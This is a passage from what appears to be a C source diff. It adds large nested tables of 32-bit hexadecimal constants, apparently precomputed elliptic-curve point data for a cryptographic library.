UINT32_C(0xDD393067), UINT32_C(0xD20C8BF9) } }, ++ { { UINT32_C(0x81625E78), UINT32_C(0x4EC874EA), UINT32_C(0x3FBE9267), ++ UINT32_C(0x8B8D8B5A), UINT32_C(0x9421EC2F), UINT32_C(0xA3D9D164), ++ UINT32_C(0x880EA295), UINT32_C(0x490E92D9), UINT32_C(0xD8F3B6DA), ++ UINT32_C(0x745D1EDC), UINT32_C(0x8F18BA03), UINT32_C(0x0116628B) }, ++ { UINT32_C(0x834EADCE), UINT32_C(0x0FF6BCE0), UINT32_C(0x000827F7), ++ UINT32_C(0x464697F2), UINT32_C(0x498D724E), UINT32_C(0x08DCCF84), ++ UINT32_C(0x1E88304C), UINT32_C(0x7896D365), UINT32_C(0x135E3622), ++ UINT32_C(0xE63EBCCE), UINT32_C(0xDC007521), UINT32_C(0xFB942E8E) } }, ++ { { UINT32_C(0xA3688621), UINT32_C(0xBB155A66), UINT32_C(0xF91B52A3), ++ UINT32_C(0xED2FD7CD), UINT32_C(0xEA20CB88), UINT32_C(0x52798F5D), ++ UINT32_C(0x373F7DD8), UINT32_C(0x069CE105), UINT32_C(0x8CA78F6B), ++ UINT32_C(0xF9392EC7), UINT32_C(0x6B335169), UINT32_C(0xB3013E25) }, ++ { UINT32_C(0x6B11715C), UINT32_C(0x1D92F800), UINT32_C(0xFF9DC464), ++ UINT32_C(0xADD4050E), UINT32_C(0x8465B84A), UINT32_C(0x2AC22659), ++ UINT32_C(0x465B2BD6), UINT32_C(0x2729D646), UINT32_C(0xE4EFF9DD), ++ UINT32_C(0x6202344A), UINT32_C(0xCD9B90B9), UINT32_C(0x51F3198F) } }, ++ { { UINT32_C(0xE5F0AE1D), UINT32_C(0x17CE54EF), UINT32_C(0xB09852AF), ++ UINT32_C(0x984E8204), UINT32_C(0xC4B27A71), UINT32_C(0x3365B37A), ++ UINT32_C(0xA00E0A9C), UINT32_C(0x720E3152), UINT32_C(0x925BD606), ++ UINT32_C(0x3692F70D), UINT32_C(0x7BC7E9AB), UINT32_C(0xBE6E699D) }, ++ { UINT32_C(0x4C89A3C0), UINT32_C(0xD75C041F), UINT32_C(0x8DC100C0), ++ UINT32_C(0x8B9F592D), UINT32_C(0xAD228F71), UINT32_C(0x30750F3A), ++ UINT32_C(0xE8B17A11), UINT32_C(0x1B9ECF84), UINT32_C(0x0FBFA8A2), ++ UINT32_C(0xDF202562), UINT32_C(0xAA1B6D67), UINT32_C(0x45C811FC) } }, ++ { { UINT32_C(0x1A5151F8), UINT32_C(0xEC5B84B7), UINT32_C(0x550AB2D2), ++ UINT32_C(0x118E59E8), UINT32_C(0x049BD735), UINT32_C(0x2CCDEDA4), ++ UINT32_C(0x9CD62F0F), UINT32_C(0xC99CBA71), UINT32_C(0x62C9E4F8), ++ UINT32_C(0x69B8040A), UINT32_C(0x110B8283), UINT32_C(0x16F1A31A) }, ++ { UINT32_C(0x98E908A3), UINT32_C(0x53F63802), UINT32_C(0xD862F9DE), ++ UINT32_C(0x308CB6EF), UINT32_C(0xA521A95A), UINT32_C(0xE185DAD8), ++ UINT32_C(0x097F75CA), UINT32_C(0x4D8FE9A4), UINT32_C(0x1CA07D53), ++ UINT32_C(0xD1ECCEC7), UINT32_C(0x0DB07E83), UINT32_C(0x13DFA1DC) } }, ++ { { UINT32_C(0x0F591A76), UINT32_C(0xDDAF9DC6), UINT32_C(0x1685F412), ++ UINT32_C(0xE1A6D7CC), UINT32_C(0x002B6E8D), UINT32_C(0x153DE557), ++ UINT32_C(0xC6DA37D9), UINT32_C(0x730C38BC), UINT32_C(0x0914B597), ++ UINT32_C(0xAE180622), UINT32_C(0xDD8C3A0A), UINT32_C(0x84F98103) }, ++ { UINT32_C(0x8DA205B0), UINT32_C(0x369C5398), UINT32_C(0x3888A720), ++ UINT32_C(0xA3D95B81), UINT32_C(0xE10E2806), UINT32_C(0x1F3F8BBF), ++ UINT32_C(0x4530D1F3), UINT32_C(0x48663DF5), UINT32_C(0x3E377713), ++ UINT32_C(0x320523B4), UINT32_C(0xC7894814), UINT32_C(0xE8B1A575) } }, ++ { { UINT32_C(0x2EE8EA07), UINT32_C(0x33066871), UINT32_C(0x60DA199D), ++ UINT32_C(0xC6FB4EC5), UINT32_C(0xF4370A05), UINT32_C(0x33231860), ++ UINT32_C(0xC6DE4E26), UINT32_C(0x7ABECE72), UINT32_C(0xEBDECE7A), ++ UINT32_C(0xDE8D4BD8), UINT32_C(0x1CBE93C7), UINT32_C(0xC90EE657) }, ++ { UINT32_C(0x85AC2509), UINT32_C(0x0246751B), UINT32_C(0x30380245), ++ UINT32_C(0xD0EF142C), UINT32_C(0x7C76E39C), UINT32_C(0x086DF9C4), ++ UINT32_C(0xB789FB56), UINT32_C(0x68F1304F), UINT32_C(0xA5E4BD56), ++ UINT32_C(0x23E4CB98), UINT32_C(0x64663DCA), UINT32_C(0x69A4C63C) } }, ++ { { UINT32_C(0x7CB34E63), UINT32_C(0x6C72B6AF), UINT32_C(0x6DFC23FE), ++ UINT32_C(0x073C40CD), UINT32_C(0xC936693A), UINT32_C(0xBDEEE7A1), ++ UINT32_C(0x6EFAD378), UINT32_C(0xBC858E80), UINT32_C(0xF5BE55D4), ++ UINT32_C(0xEAD719FF), UINT32_C(0x04552F5F), UINT32_C(0xC8C3238F) }, ++ { UINT32_C(0x928D5784), UINT32_C(0x0952C068), UINT32_C(0x94C58F2B), ++ UINT32_C(0x89DFDF22), UINT32_C(0x67502C50), UINT32_C(0x332DEDF3), ++ UINT32_C(0xAC0BE258), UINT32_C(0x3ED2FA3A), UINT32_C(0x7C5C8244), ++ UINT32_C(0xAEDC9B8A), UINT32_C(0xDC0EA34F), UINT32_C(0x43A761B9) } }, ++ { { UINT32_C(0xCC5E21A5), UINT32_C(0x8FD683A2), UINT32_C(0xFBA2BB68), ++ UINT32_C(0x5F444C6E), UINT32_C(0xAF05586D), UINT32_C(0x709ACD0E), ++ UINT32_C(0xDE8FB348), UINT32_C(0x8EFA54D2), UINT32_C(0x34CFE29E), ++ UINT32_C(0x35276B71), UINT32_C(0x941EAC8C), UINT32_C(0x77A06FCD) }, ++ { UINT32_C(0x928322DD), UINT32_C(0x5815792D), UINT32_C(0x67F7CB59), ++ UINT32_C(0x82FF356B), UINT32_C(0x304980F4), UINT32_C(0x71E40A78), ++ UINT32_C(0x3667D021), UINT32_C(0xC8645C27), UINT32_C(0xAEBAE28F), ++ UINT32_C(0xE785741C), UINT32_C(0x53ECAC37), UINT32_C(0xB2C1BC75) } }, ++ { { UINT32_C(0x1D0A74DB), UINT32_C(0x633EB24F), UINT32_C(0xFA752512), ++ UINT32_C(0xF1F55E56), UINT32_C(0x8EFE11DE), UINT32_C(0x75FECA68), ++ UINT32_C(0xE6BF19EC), UINT32_C(0xC80FD91C), UINT32_C(0x2A14C908), ++ UINT32_C(0xAD0BAFEC), UINT32_C(0xADE4031F), UINT32_C(0x4E1C4ACA) }, ++ { UINT32_C(0x1EB1549A), UINT32_C(0x463A815B), UINT32_C(0x668F1298), ++ UINT32_C(0x5AD4253C), UINT32_C(0x38A37151), UINT32_C(0x5CB38662), ++ UINT32_C(0xAFF16B96), UINT32_C(0x34BB1CCF), UINT32_C(0xEE731AB0), ++ UINT32_C(0xDCA93B13), UINT32_C(0x9BE01A0B), UINT32_C(0x9F3CE5CC) } }, ++ { { UINT32_C(0xA110D331), UINT32_C(0x75DB5723), UINT32_C(0x7123D89F), ++ UINT32_C(0x67C66F6A), UINT32_C(0x4009D570), UINT32_C(0x27ABBD4B), ++ UINT32_C(0xC73451BC), UINT32_C(0xACDA6F84), UINT32_C(0x05575ACF), ++ UINT32_C(0xE4B9A239), UINT32_C(0xAB2D3D6C), UINT32_C(0x3C2DB7EF) }, ++ { UINT32_C(0x29115145), UINT32_C(0x01CCDD08), UINT32_C(0x57B5814A), ++ UINT32_C(0x9E0602FE), UINT32_C(0x87862838), UINT32_C(0x679B35C2), ++ UINT32_C(0x38AD598D), UINT32_C(0x0277DC4C), UINT32_C(0x6D896DD4), ++ UINT32_C(0xEF80A213), UINT32_C(0xE7B9047B), UINT32_C(0xC8812213) } }, ++ }, ++ { ++ { { UINT32_C(0xEDC9CE62), UINT32_C(0xAC6DBDF6), UINT32_C(0x0F9C006E), ++ UINT32_C(0xA58F5B44), UINT32_C(0xDC28E1B0), UINT32_C(0x16694DE3), ++ UINT32_C(0xA6647711), UINT32_C(0x2D039CF2), UINT32_C(0xC5B08B4B), ++ UINT32_C(0xA13BBE6F), UINT32_C(0x10EBD8CE), UINT32_C(0xE44DA930) }, ++ { UINT32_C(0x19649A16), UINT32_C(0xCD472087), UINT32_C(0x683E5DF1), ++ UINT32_C(0xE18F4E44), UINT32_C(0x929BFA28), UINT32_C(0xB3F66303), ++ UINT32_C(0x818249BF), UINT32_C(0x7C378E43), UINT32_C(0x847F7CD9), ++ UINT32_C(0x76068C80), UINT32_C(0x987EBA16), UINT32_C(0xEE3DB6D1) } }, ++ { { UINT32_C(0xC42A2F52), UINT32_C(0xCBBD8576), UINT32_C(0x9D2B06BB), ++ UINT32_C(0x9ACC6F70), UINT32_C(0x2E6B72A4), UINT32_C(0xE5CB5620), ++ UINT32_C(0x7C024443), UINT32_C(0x5738EA0E), UINT32_C(0xB55368F3), ++ UINT32_C(0x8ED06170), UINT32_C(0x1AEED44F), UINT32_C(0xE54C99BB) }, ++ { UINT32_C(0xE2E0D8B2), UINT32_C(0x3D90A6B2), UINT32_C(0xCF7B2856), ++ UINT32_C(0x21718977), UINT32_C(0xC5612AEC), UINT32_C(0x089093DC), ++ UINT32_C(0x99C1BACC), UINT32_C(0xC272EF6F), UINT32_C(0xDC43EAAD), ++ UINT32_C(0x47DB3B43), UINT32_C(0x0832D891), UINT32_C(0x730F30E4) } }, ++ { { UINT32_C(0x0C7FECDB), UINT32_C(0x9FFE5563), UINT32_C(0xF88101E5), ++ UINT32_C(0x55CC67B6), UINT32_C(0xCBEFA3C7), UINT32_C(0x3039F981), ++ UINT32_C(0x667BFD64), UINT32_C(0x2AB06883), UINT32_C(0x4340E3DF), ++ UINT32_C(0x9007A257), UINT32_C(0x5A3A49CA), UINT32_C(0x1AC3F3FA) }, ++ { UINT32_C(0xC97E20FD), UINT32_C(0x9C7BE629), UINT32_C(0xA3DAE003), ++ UINT32_C(0xF61823D3), UINT32_C(0xE7380DBA), UINT32_C(0xFFE7FF39), ++ UINT32_C(0x9FACC3B8), UINT32_C(0x620BB9B5), UINT32_C(0x31AE422C), ++ UINT32_C(0x2DDCB8CD), UINT32_C(0xD12C3C43), UINT32_C(0x1DE3BCFA) } }, ++ { { UINT32_C(0xD6E0F9A9), UINT32_C(0x8C074946), UINT32_C(0x51C3B05B), ++ UINT32_C(0x662FA995), UINT32_C(0x04BB2048), UINT32_C(0x6CDAE969), ++ UINT32_C(0xD6DC8B60), UINT32_C(0x6DEC9594), UINT32_C(0x54438BBC), ++ UINT32_C(0x8D265869), UINT32_C(0x1B0E95A5), UINT32_C(0x88E983E3) }, ++ { UINT32_C(0x60CBF838), UINT32_C(0x8189F114), UINT32_C(0x771DC46B), ++ UINT32_C(0x77190697), UINT32_C(0x27F8EC1A), UINT32_C(0x775775A2), ++ UINT32_C(0x607E3739), UINT32_C(0x7A125240), UINT32_C(0x4F793E4E), ++ UINT32_C(0xAFAE84E7), UINT32_C(0x5BF5BAF4), UINT32_C(0x44FA17F3) } }, ++ { { UINT32_C(0xD03AC439), UINT32_C(0xA21E69A5), UINT32_C(0x88AA8094), ++ UINT32_C(0x2069C5FC), UINT32_C(0x8C08F206), UINT32_C(0xB041EEA7), ++ UINT32_C(0x3D65B8ED), UINT32_C(0x55B9D461), UINT32_C(0xD392C7C4), ++ UINT32_C(0x951EA25C), UINT32_C(0x9D166232), UINT32_C(0x4B9A1CEC) }, ++ { UINT32_C(0xFCF931A4), UINT32_C(0xC184FCD8), UINT32_C(0x063AD374), ++ UINT32_C(0xBA59AD44), UINT32_C(0x1AA9796F), UINT32_C(0x1868AD2A), ++ UINT32_C(0xDFF29832), UINT32_C(0x38A34018), UINT32_C(0x03DF8070), ++ UINT32_C(0x01FC8801), UINT32_C(0x48DD334A), UINT32_C(0x1282CCE0) } }, ++ { { UINT32_C(0x26D8503C), UINT32_C(0x76AA9557), UINT32_C(0x6BC3E3D0), ++ UINT32_C(0xBE962B63), UINT32_C(0x97DE8841), UINT32_C(0xF5CA93E5), ++ UINT32_C(0xAF3F2C16), UINT32_C(0x1561B05E), UINT32_C(0xD34BFF98), ++ UINT32_C(0x34BE00AA), UINT32_C(0xD23D2925), UINT32_C(0xEA21E6E9) }, ++ { UINT32_C(0x394C3AFB), UINT32_C(0x55713230), UINT32_C(0xD6C8BECA), ++ UINT32_C(0xEAF0529B), UINT32_C(0x202B9A11), UINT32_C(0xFF38A743), ++ UINT32_C(0x6D3A398B), UINT32_C(0xA13E39FC), UINT32_C(0x86E2615A), ++ UINT32_C(0x8CBD644B), UINT32_C(0x191057EC), UINT32_C(0x92063988) } }, ++ { { UINT32_C(0x13F89146), UINT32_C(0x787835CE), UINT32_C(0x69446C3F), ++ UINT32_C(0x7FCD42CC), UINT32_C(0x840E679D), UINT32_C(0x0DA2AA98), ++ UINT32_C(0x18779A1B), UINT32_C(0x44F20523), UINT32_C(0xEFBF5935), ++ UINT32_C(0xE3A3B34F), UINT32_C(0xB9947B70), UINT32_C(0xA5D2CFD0) }, ++ { UINT32_C(0x27F4E16F), UINT32_C(0xAE2AF4EF), UINT32_C(0xB9D21322), ++ UINT32_C(0xA7FA70D2), UINT32_C(0xB3FD566B), UINT32_C(0x68084919), ++ UINT32_C(0xD7AAD6AB), UINT32_C(0xF04D71C8), UINT32_C(0x10BC4260), ++ UINT32_C(0xDBEA21E4), UINT32_C(0x8D949B42), UINT32_C(0xAA7DC665) } }, ++ { { UINT32_C(0x6CCB8213), UINT32_C(0xD8E958A0), UINT32_C(0x91900B54), ++ UINT32_C(0x118D9DB9), UINT32_C(0x85E8CED6), UINT32_C(0x09BB9D49), ++ UINT32_C(0x24019281), UINT32_C(0x410E9FB5), UINT32_C(0x6D74C86E), ++ UINT32_C(0x3B31B4E1), UINT32_C(0x020BB77D), UINT32_C(0x52BC0252) }, ++ { UINT32_C(0x27092CE4), UINT32_C(0x5616A26F), UINT32_C(0xA08F65CD), ++ UINT32_C(0x67774DBC), UINT32_C(0xC08BD569), UINT32_C(0x560AD494), ++ UINT32_C(0xAD498783), UINT32_C(0xBE26DA36), UINT32_C(0x7F019C91), ++ UINT32_C(0x0276C8AB), UINT32_C(0x5248266E), UINT32_C(0x09843ADA) } }, ++ { { UINT32_C(0x7D963CF2), UINT32_C(0xA0AE88A7), UINT32_C(0xD0E84920), ++ UINT32_C(0x91EF8986), UINT32_C(0xF8C58104), UINT32_C(0xC7EFE344), ++ UINT32_C(0xECA20773), UINT32_C(0x0A25D9FD), UINT32_C(0x00D8F1D5), ++ UINT32_C(0x9D989FAA), UINT32_C(0xC8B06264), UINT32_C(0x4204C8CE) }, ++ { UINT32_C(0xBE1A2796), UINT32_C(0x717C12E0), UINT32_C(0xC190C728), ++ UINT32_C(0x1FA4BA8C), UINT32_C(0x8C8A59BA), UINT32_C(0xA245CA8D), ++ UINT32_C(0x7672B935), UINT32_C(0xE3C37475), UINT32_C(0x2E4D6375), ++ UINT32_C(0x083D5E40), UINT32_C(0x5455E16E), UINT32_C(0x0B8D5AB3) } }, ++ { { UINT32_C(0xEED765D4), UINT32_C(0x1DB17DBF), UINT32_C(0xA5DDB965), ++ UINT32_C(0xBBC9B1BE), UINT32_C(0xDFC12ABC), UINT32_C(0x1948F76D), ++ UINT32_C(0x134EF489), UINT32_C(0x2C2714E5), UINT32_C(0x741C600F), ++ UINT32_C(0x60CE2EE8), UINT32_C(0xF80E6E63), UINT32_C(0x32396F22) }, ++ { UINT32_C(0x22537F59), UINT32_C(0x421DAC75), UINT32_C(0x49475DF5), ++ UINT32_C(0x58FB73C6), UINT32_C(0x6F18F1C7), UINT32_C(0x0ABF2885), ++ UINT32_C(0x9A398D16), UINT32_C(0x36474468), UINT32_C(0xBF673B87), ++ UINT32_C(0x87A661A7), UINT32_C(0x73819E17), UINT32_C(0x3E80698F) } }, ++ { { UINT32_C(0x53784CC4), UINT32_C(0xDFE49793), UINT32_C(0x486D508F), ++ UINT32_C(0x4280EAB0), UINT32_C(0xE534F5A4), UINT32_C(0x119593FF), ++ UINT32_C(0x9F63242F), UINT32_C(0x98AEFADD), UINT32_C(0xC4829CAE), ++ UINT32_C(0x9AE6A24A), UINT32_C(0x58E8BA80), UINT32_C(0xF2373CA5) }, ++ { UINT32_C(0x51765FB3), UINT32_C(0x4017AF7E), UINT32_C(0xAF4AEC4B), ++ UINT32_C(0xD1E40F7C), UINT32_C(0x0898E3BC), UINT32_C(0x87372C7A), ++ UINT32_C(0x85452CA9), UINT32_C(0x688982B2), UINT32_C(0xB1E50BCA), ++ UINT32_C(0x71E0B4BF), UINT32_C(0xF70E714A), UINT32_C(0x21FD2DBF) } }, ++ { { UINT32_C(0xFB78DDAC), UINT32_C(0xEE6E8820), UINT32_C(0x063892CD), ++ UINT32_C(0x0BAED29C), UINT32_C(0x28C0588D), UINT32_C(0x5F33049C), ++ UINT32_C(0x18DBC432), UINT32_C(0x90C2515E), UINT32_C(0x3B4CB0BD), ++ UINT32_C(0xB8A1B143), UINT32_C(0x68103043), UINT32_C(0x0AB5C0C9) }, ++ { UINT32_C(0x4005EC40), UINT32_C(0xF3788FA0), UINT32_C(0x039EE115), ++ UINT32_C(0x82571C99), UINT32_C(0x93260BED), UINT32_C(0xEE8FCED5), ++ UINT32_C(0x10836D18), UINT32_C(0x5A9BAF79), UINT32_C(0xC46AA4F6), ++ UINT32_C(0x7C258B09), UINT32_C(0x37F53D31), UINT32_C(0x46ECC5E8) } }, ++ { { UINT32_C(0xBFE0DD98), UINT32_C(0xFA32C0DC), UINT32_C(0x962B1066), ++ UINT32_C(0x66EFAFC4), UINT32_C(0x64BDF5EB), UINT32_C(0xBA81D33E), ++ UINT32_C(0xFC7FC512), UINT32_C(0x36C28536), UINT32_C(0xE0B4FA97), ++ UINT32_C(0x0C95176B), UINT32_C(0x3B9BC64A), UINT32_C(0x47DDE29B) }, ++ { UINT32_C(0x5C173B36), UINT32_C(0x08D986FD), UINT32_C(0x6CF3F28C), ++ UINT32_C(0x46D84B52), UINT32_C(0xF026BDB9), UINT32_C(0x6F6ED6C3), ++ UINT32_C(0x68206DC5), UINT32_C(0xAC90668B), UINT32_C(0xECBE4E70), ++ UINT32_C(0xE8ED5D98), UINT32_C(0xDC1A6974), UINT32_C(0xCFFF61DD) } }, ++ { { UINT32_C(0x77B1A5C1), UINT32_C(0xFF5C3A29), UINT32_C(0x0DDF995D), ++ UINT32_C(0x10C27E4A), UINT32_C(0xE23363E3), UINT32_C(0xCB745F77), ++ UINT32_C(0x32F399A3), UINT32_C(0xD765DF6F), UINT32_C(0x8A99E109), ++ UINT32_C(0xF0CA0C2F), UINT32_C(0x1E025CA0), UINT32_C(0xC3A6BFB7) }, ++ { UINT32_C(0x4F9D9FA5), UINT32_C(0x830B2C0A), UINT32_C(0xBD1A84E5), ++ UINT32_C(0xAE914CAC), UINT32_C(0xA4FEBCC1), UINT32_C(0x30B35ED8), ++ UINT32_C(0x84CFBF2E), UINT32_C(0xCB902B46), UINT32_C(0x25FC6375), ++ UINT32_C(0x0BD47628), UINT32_C(0x85509D04), UINT32_C(0xA858A53C) } }, ++ { { UINT32_C(0x552E0A3F), UINT32_C(0x8B995D0C), UINT32_C(0x17BE9FF7), ++ UINT32_C(0xEDBD4E94), UINT32_C(0x95085178), UINT32_C(0x3432E839), ++ UINT32_C(0x80C256F5), UINT32_C(0x0FE5C181), UINT32_C(0xEBF9597C), ++ UINT32_C(0x05A64EA8), UINT32_C(0x3F80371F), UINT32_C(0x6ED44BB1) }, ++ { UINT32_C(0xFE4C12EE), UINT32_C(0x6A29A05E), UINT32_C(0xE0BB83B3), ++ UINT32_C(0x3E436A43), UINT32_C(0x74D72921), UINT32_C(0x38365D9A), ++ UINT32_C(0xC38E1ED7), UINT32_C(0x3F5EE823), UINT32_C(0xE8FA063F), ++ UINT32_C(0x09A53213), UINT32_C(0xB435E713), UINT32_C(0x1E7FE47A) } }, ++ { { UINT32_C(0xFDDD17F3), UINT32_C(0xE4D9BC94), UINT32_C(0xC1016C20), ++ UINT32_C(0xC74B8FED), UINT32_C(0xB49C060E), UINT32_C(0x095DE39B), ++ UINT32_C(0x8AC0DF00), UINT32_C(0xDBCC6795), UINT32_C(0x1C34F4DF), ++ UINT32_C(0x4CF6BAEB), UINT32_C(0xE8390170), UINT32_C(0x72C55C21) }, ++ { UINT32_C(0xF6C48E79), UINT32_C(0x4F17BFD2), UINT32_C(0x017A80BA), ++ UINT32_C(0x18BF4DA0), UINT32_C(0xBCF4B138), UINT32_C(0xCF51D829), ++ UINT32_C(0xF48F8B0D), UINT32_C(0x598AEE5F), UINT32_C(0x20F10809), ++ UINT32_C(0x83FAEE56), UINT32_C(0x779F0850), UINT32_C(0x4615D4DC) } }, ++ }, ++ { ++ { { UINT32_C(0x5852B59B), UINT32_C(0x22313DEE), UINT32_C(0xB6A0B37F), ++ UINT32_C(0x6F56C8E8), UINT32_C(0xA76EC380), UINT32_C(0x43D6EEAE), ++ UINT32_C(0x0275AD36), UINT32_C(0xA1655136), UINT32_C(0xDF095BDA), ++ UINT32_C(0xE5C1B65A), UINT32_C(0x367C44B0), UINT32_C(0xBD1FFA8D) }, ++ { UINT32_C(0x6B48AF2B), UINT32_C(0xE2B419C2), UINT32_C(0x3DA194C8), ++ UINT32_C(0x57BBBD97), UINT32_C(0xA2BAFF05), UINT32_C(0xB5FBE51F), ++ UINT32_C(0x6269B5D0), UINT32_C(0xA0594D70), UINT32_C(0x23E8D667), ++ UINT32_C(0x0B07B705), UINT32_C(0x63E016E7), UINT32_C(0xAE1976B5) } }, ++ { { UINT32_C(0xFBECAAAE), UINT32_C(0x2FDE4893), UINT32_C(0x30332229), ++ UINT32_C(0x444346DE), UINT32_C(0x09456ED5), UINT32_C(0x157B8A5B), ++ UINT32_C(0x25797C6C), UINT32_C(0x73606A79), UINT32_C(0x33C14C06), ++ UINT32_C(0xA9D0F47C), UINT32_C(0xFAF971CA), UINT32_C(0x7BC8962C) }, ++ { UINT32_C(0x65909DFD), UINT32_C(0x6E763C51), UINT32_C(0x14A9BF42), ++ UINT32_C(0x1BBBE41B), UINT32_C(0xC49E9EFC), UINT32_C(0xD95B7ECB), ++ UINT32_C(0xB38F2B59), UINT32_C(0x0C317927), UINT32_C(0xB3C397DB), ++ UINT32_C(0x97912B53), UINT32_C(0x45C7ABC7), UINT32_C(0xCB3879AA) } }, ++ { { UINT32_C(0x24359B81), UINT32_C(0xCD81BDCF), UINT32_C(0xDB4C321C), ++ UINT32_C(0x6FD326E2), UINT32_C(0xF8EBE39C), UINT32_C(0x4CB0228B), ++ UINT32_C(0xB2CDD852), UINT32_C(0x496A9DCE), UINT32_C(0xD0E9B3AF), ++ UINT32_C(0x0F115A1A), UINT32_C(0xD8EEEF8A), UINT32_C(0xAA08BF36) }, ++ { UINT32_C(0x06E5E739), UINT32_C(0x5232A515), UINT32_C(0x8407A551), ++ UINT32_C(0x21FAE9D5), UINT32_C(0x8994B4E8), UINT32_C(0x289D18B0), ++ UINT32_C(0x09097A52), UINT32_C(0xB4E346A8), UINT32_C(0x324621D0), ++ UINT32_C(0xC641510F), UINT32_C(0x95A41AB8), UINT32_C(0xC567FD4A) } }, ++ { { UINT32_C(0xD57C8DE9), UINT32_C(0x261578C7), UINT32_C(0x3836C5C8), ++ UINT32_C(0xB9BC491F), UINT32_C(0x14C8038F), UINT32_C(0x993266B4), ++ UINT32_C(0xFAA7CC39), UINT32_C(0xBACAD755), UINT32_C(0xD69B7E27), ++ UINT32_C(0x418C4DEF), UINT32_C(0xAE751533), UINT32_C(0x53FDC5CD) }, ++ { UINT32_C(0xC3EEA63A), UINT32_C(0x6F3BD329), UINT32_C(0xE53DD29E), ++ UINT32_C(0xA7A22091), UINT32_C(0xDC4C54EC), UINT32_C(0xB7164F73), ++ UINT32_C(0x44D3D74E), UINT32_C(0xCA66290D), UINT32_C(0x4C9EA511), ++ UINT32_C(0xF77C6242), UINT32_C(0x1F714C49), UINT32_C(0x34337F55) } }, ++ { { UINT32_C(0xA64B6C4B), UINT32_C(0x5ED2B216), UINT32_C(0x3AAE640D), ++ UINT32_C(0x1C38794F), UINT32_C(0x8905794F), UINT32_C(0x30BBAEE0), ++ UINT32_C(0xC8699CFB), UINT32_C(0x0D9EE41E), UINT32_C(0xCF7B7C29), ++ UINT32_C(0xAF38DAF2), UINT32_C(0x43E53513), UINT32_C(0x0D6A05CA) }, ++ { UINT32_C(0x2606AB56), UINT32_C(0xBE96C644), UINT32_C(0xE9EB9734), ++ UINT32_C(0x13E7A072), UINT32_C(0x5FF50CD7), UINT32_C(0xF9669445), ++ UINT32_C(0x47DA6F1D), UINT32_C(0x68EF26B5), UINT32_C(0x23687CB7), ++ UINT32_C(0xF0028738), UINT32_C(0x6217C1CE), UINT32_C(0x5ED9C876) } }, ++ { { UINT32_C(0x0A3A9691), UINT32_C(0x423BA513), UINT32_C(0xB3179296), ++ UINT32_C(0xF421B1E7), UINT32_C(0x1A871E1B), UINT32_C(0x6B51BCDB), ++ UINT32_C(0x464E4300), UINT32_C(0x6E3BB5B5), UINT32_C(0xFC6C54CC), ++ UINT32_C(0x24171E2E), UINT32_C(0xD3E58DC2), UINT32_C(0xA9DFA947) }, ++ { UINT32_C(0x9DE9CFA7), UINT32_C(0x175B3309), UINT32_C(0x2D1015DA), ++ UINT32_C(0x707B2529), UINT32_C(0x993EA65A), UINT32_C(0xCBB95F17), ++ UINT32_C(0x0447450D), UINT32_C(0x93515063), UINT32_C(0x1B2753C9), ++ UINT32_C(0x0F47B205), UINT32_C(0xE7D427CF), UINT32_C(0x4A0BAB14) } }, ++ { { UINT32_C(0xB5AA7CA1), UINT32_C(0xA39DEF39), UINT32_C(0xC47C33DF), ++ UINT32_C(0x591CB173), UINT32_C(0x6BBAB872), UINT32_C(0xA09DAC79), ++ UINT32_C(0x7208BA2F), UINT32_C(0x3EF9D7CF), UINT32_C(0x7A0A34FC), ++ UINT32_C(0x3CC18931), UINT32_C(0xBCC3380F), UINT32_C(0xAE31C62B) }, ++ { UINT32_C(0x0287C0B4), UINT32_C(0xD72A6794), UINT32_C(0x68E334F1), ++ UINT32_C(0x3373382C), UINT32_C(0xBD20C6A6), UINT32_C(0xD0310CA8), ++ UINT32_C(0x42C033FD), UINT32_C(0xA2734B87), UINT32_C(0x8DCE4509), ++ UINT32_C(0xA5D390F1), UINT32_C(0x3E1AFCB5), UINT32_C(0xFC84E74B) } }, ++ { { UINT32_C(0xF2CD8A9C), UINT32_C(0xB028334D), UINT32_C(0x570F76F6), ++ UINT32_C(0xB8719291), UINT32_C(0x01065A2D), UINT32_C(0x662A386E), ++ UINT32_C(0x53D940AE), UINT32_C(0xDF1634CB), UINT32_C(0x8F5B41F9), ++ UINT32_C(0x625A7B83), UINT32_C(0xEE6AA1B4), UINT32_C(0xA033E4FE) }, ++ { UINT32_C(0x1E42BABB), UINT32_C(0x51E9D463), UINT32_C(0x0D388468), ++ UINT32_C(0x660BC2E4), UINT32_C(0xFCBB114A), UINT32_C(0x3F702189), ++ UINT32_C(0xB414CA78), UINT32_C(0x6B46FE35), UINT32_C(0x4A57316B), ++ UINT32_C(0x328F6CF2), UINT32_C(0x381AD156), UINT32_C(0x917423B5) } }, ++ { { UINT32_C(0x5373A607), UINT32_C(0xAC19306E), UINT32_C(0x191D0969), ++ UINT32_C(0x471DF8E3), UINT32_C(0xB9720D83), UINT32_C(0x380ADE35), ++ UINT32_C(0x48F1FD5C), UINT32_C(0x7423FDF5), UINT32_C(0x49CABC95), ++ UINT32_C(0x8B090C9F), UINT32_C(0xC9842F2F), UINT32_C(0xB768E8CD) }, ++ { UINT32_C(0xE56162D6), UINT32_C(0x399F456D), UINT32_C(0x4F326791), ++ UINT32_C(0xBB6BA240), UINT32_C(0x342590BE), UINT32_C(0x8F4FBA3B), ++ UINT32_C(0x3DFB6B3E), UINT32_C(0x053986B9), UINT32_C(0x190C7425), ++ UINT32_C(0xBB6739F1), UINT32_C(0x32F7E95F), UINT32_C(0x32D4A553) } }, ++ { { UINT32_C(0x0DDBFB21), UINT32_C(0x0205A0EC), UINT32_C(0x33AC3407), ++ UINT32_C(0x3010327D), UINT32_C(0x3348999B), UINT32_C(0xCF2F4DB3), ++ UINT32_C(0x1551604A), UINT32_C(0x660DB9F4), UINT32_C(0x5D38D335), ++ UINT32_C(0xC346C69A), UINT32_C(0x38882479), UINT32_C(0x64AAB3D3) }, ++ { UINT32_C(0x6AE44403), UINT32_C(0xA096B5E7), UINT32_C(0x645F76CD), ++ UINT32_C(0x6B4C9571), UINT32_C(0x4711120F), UINT32_C(0x72E1CD5F), ++ UINT32_C(0xF27CC3E1), UINT32_C(0x93EC42AC), UINT32_C(0xA72ABB12), ++ UINT32_C(0x2D18D004), UINT32_C(0xC9841A04), UINT32_C(0x232E9568) } }, ++ { { UINT32_C(0x3CC7F908), UINT32_C(0xFF01DB22), UINT32_C(0xD13CDD3B), ++ UINT32_C(0x9F214F8F), UINT32_C(0xE0B014B5), UINT32_C(0x38DADBB7), ++ UINT32_C(0x94245C95), UINT32_C(0x2C548CCC), UINT32_C(0x809AFCE3), ++ UINT32_C(0x714BE331), UINT32_C(0x9BFE957E), UINT32_C(0xBCC64410) }, ++ { UINT32_C(0x5B957F80), UINT32_C(0xC21C2D21), UINT32_C(0xBB8A4C42), ++ 